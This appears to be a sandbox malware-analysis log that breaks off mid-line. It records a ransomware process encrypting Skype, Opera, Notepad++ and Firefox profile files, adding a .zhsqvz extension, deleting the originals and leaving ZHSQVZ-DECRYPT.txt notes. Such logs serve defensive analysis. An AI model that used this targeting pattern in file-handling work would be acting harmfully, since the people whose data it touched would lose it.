2180 3468116065.exe C:\Users\admin\AppData\Roaming\Skype\shared_httpfe\ZHSQVZ-DECRYPT.txt text
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Skype\shared_dynco\dc.db-journal.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Skype\shared_dynco\dc.db.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Skype\shared_dynco\dc.db ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Skype\shared_dynco\dc.db-journal ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Skype\shared_dynco\ZHSQVZ-DECRYPT.txt text
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Skype\shared.xml.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Skype\shared.xml ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Skype\DataRv\offline-storage.data.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Skype\logs\ZHSQVZ-DECRYPT.txt text
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Skype\DataRv\offline-storage.data ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Skype\DataRv\ZHSQVZ-DECRYPT.txt text
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\wand.dat.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\webserver\ZHSQVZ-DECRYPT.txt text
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\vlink4.dat.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\webserver\users.xml.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Skype\ZHSQVZ-DECRYPT.txt text
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\webserver\users.xml ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\wand.dat ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\vlink4.dat ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\tips.ini.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\tasks.xml.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\typed_history.xml.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\tips.ini ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\typed_history.xml ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\tasks.xml ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\toc.css.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\tablelayout.css.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\toc.css ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\tablelayout.css ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\structureinline.css.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\structuretables.css.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\structureinline.css ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\structuretables.css ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\outline.css.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\structureblock.css.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\structureblock.css ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\outline.css ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\disabletables.css.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\disabletables.css ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\disablepositioning.css.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\disableforms.css.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\disablepositioning.css ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\disablebreaks.css.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\disablefloats.css.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\disablefloats.css ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\disableforms.css ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\disablebreaks.css ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\contrastwb.css.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\contrastbw.css.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\contrastbw.css ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\contrastwb.css ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\altdebugger.css.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\classid.css.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\altdebugger.css ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\classid.css ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\ZHSQVZ-DECRYPT.txt text
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\sessions\autosave.win.bak.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\styles\ZHSQVZ-DECRYPT.txt text
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\speeddial.ini.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\accessibility.css.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\accessibility.css ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\speeddial.ini ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\sessions\autosave.win.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\opuntrust.dat.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\sessions\ZHSQVZ-DECRYPT.txt text
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\sessions\autosave.win.bak ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\sessions\autosave.win ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\opuntrust.dat ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\optrust.dat.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\optrust.dat ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\opthumb.dat.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\opssl6.dat.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\oprand.dat.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\opthumb.dat ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\opssl6.dat ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\opicacrt6.dat.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\opicacrt6.dat ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\oprand.dat ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\opcert6.dat.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\operaprefs.ini.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\operaprefs.ini ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\opcert6.dat ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\opcacrt6.dat.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\handlers.ini.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\opcacrt6.dat ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\handlers.ini ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\global_history.dat.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\global_history.dat ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\download.dat.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\download.dat ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\cookies4.dat.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Local\Temp\pidor.bmp image
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\bookmarks.adr.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\cookies4.dat ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\bookmarks.adr ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\Zenburn.xml.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\ZHSQVZ-DECRYPT.txt text
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\ZHSQVZ-DECRYPT.txt text
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\Zenburn.xml ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\vim Dark Blue.xml.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\Vibrant Ink.xml.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\vim Dark Blue.xml ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\Twilight.xml.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\Vibrant Ink.xml ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\Twilight.xml ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\Solarized-light.xml.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\Solarized.xml.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\Solarized.xml ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\Solarized-light.xml ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\Plastic Code Wrap.xml.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\Ruby Blue.xml.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\Ruby Blue.xml ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\Plastic Code Wrap.xml ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\Obsidian.xml.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\Navajo.xml.zhsqvz flc
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\Obsidian.xml ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\Navajo.xml ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\Monokai.xml.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\MossyLawn.xml.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\MossyLawn.xml ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\Monokai.xml ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\Mono Industrial.xml.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\Mono Industrial.xml ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\khaki.xml.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\khaki.xml ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\HotFudgeSundae.xml.zhsqvz gpg
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\HotFudgeSundae.xml ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\Hello Kitty.xml.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\Hello Kitty.xml ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\Deep Black.xml.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\Deep Black.xml ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\Choco.xml.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\Choco.xml ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\Black board.xml.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\Black board.xml ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\Bespin.xml.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\Bespin.xml ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Notepad++\plugins\ZHSQVZ-DECRYPT.txt text
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Notepad++\plugins\config\ZHSQVZ-DECRYPT.txt text
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\ZHSQVZ-DECRYPT.txt text
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Notepad++\functionList.xml.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Notepad++\functionList.xml ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Notepad++\contextMenu.xml.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Notepad++\contextMenu.xml ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Notepad++\ZHSQVZ-DECRYPT.txt text
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\profiles.ini.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Mozilla\SystemExtensionsDev\ZHSQVZ-DECRYPT.txt text
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\profiles.ini ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\xulstore.json.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\xulstore.json ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\webappsstore.sqlite.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\webappsstore.sqlite ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\weave\toFetch\tabs.json.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\weave\toFetch\tabs.json ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\weave\toFetch\ZHSQVZ-DECRYPT.txt text
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\weave\failed\tabs.json.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\weave\failed\tabs.json ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\weave\ZHSQVZ-DECRYPT.txt text
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\times.json.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\weave\failed\ZHSQVZ-DECRYPT.txt text
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\times.json ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage.sqlite.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage.sqlite ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\temporary\ZHSQVZ-DECRYPT.txt text
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\727688008bsleotcakcliifsittsr%.sqlite.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\727688008bsleotcakcliifsittsr%.sqlite ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\727688008bsleotcakcliifsittsr%.files\ZHSQVZ-DECRYPT.txt text
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\3899588440psinninpiFn2g%.sqlite.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\3899588440psinninpiFn2g%.sqlite ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\3899588440psinninpiFn2g%.files\ZHSQVZ-DECRYPT.txt text
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\3561288849sdhlie.sqlite.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\3561288849sdhlie.sqlite ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\3561288849sdhlie.files\ZHSQVZ-DECRYPT.txt text
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\3345959086bslnoocdkdlaiFs2t%s.sqlite.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\3345959086bslnoocdkdlaiFs2t%s.sqlite ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\3345959086bslnoocdkdlaiFs2t%s.files\ZHSQVZ-DECRYPT.txt text
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\2918063365piupsah.sqlite.zhsqvz binary
2180 3468116065.exe C:\Users\admin